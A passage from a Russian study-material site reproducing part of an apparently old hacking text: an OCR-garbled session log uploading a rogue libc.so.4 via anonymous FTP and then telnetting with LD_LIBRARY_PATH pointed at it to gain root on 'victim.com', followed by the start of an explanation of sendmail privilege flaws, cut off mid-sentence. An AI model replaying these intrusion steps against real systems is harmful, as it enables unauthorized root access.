Студопедия.Орг Главная | Случайная страница | Контакты | Мы поможем в написании вашей работы!  
 

Guest login, ok, access restrictions apply



Remote system type is UNIX.

Using binary mode to transfer files.

ftp" cd incoming

CWD command successful.

ftp" send libc. so. 4

PORT command successful.

Opening BINARY mode data connection for libc.so.4 226 Transfer

Complete.

ftp" bye

Goodbye.

evil:'# telnet

telnet" env define LD_LIBRARY_PATH /home/ftp/incoming telnet" env export

LD_LIBRARY_PATH

telnet" open victim.com

Trying 194.94.94.94...

Connected to victim.com.

Escape character is ' "]'.

Linux 1.2. 13 (victim, coin) (ttypO) Victim login: hacker

Password:

bashff cd /root

Снова sendmaH

В этом разделе мы рассмотрим две уязвимости в программе sendmail новых

Версий Очевидно, что одна из основных функций sendmail - это SMTP-демон,

Отвечающий на входящие письма. Только суперпользователь может запустить ее

В таком режиме, и это проверяется специальной процедурой самой sendmail.

Однако из-за ошибки кодирования sendmail может быть запущена в режиме

Демона так, что проверка будет пропущена. Более того, начиная с версии

Sendmail перезапустит сама себя, если получит сигнал SIGHUP с помощью

Системного вызова ехес(2), после чего она начнет исполняться с

Привилегиями суперпользователя. В этот момент, манипулируя переменными





Дата публикования: 2014-11-04; Прочитано: 273 | Нарушение авторского права страницы | Мы поможем в написании вашей работы!



studopedia.org - Студопедия.Орг - 2014-2024 год. Студопедия не является автором материалов, которые размещены. Но предоставляет возможность бесплатного использования (0.007 с)...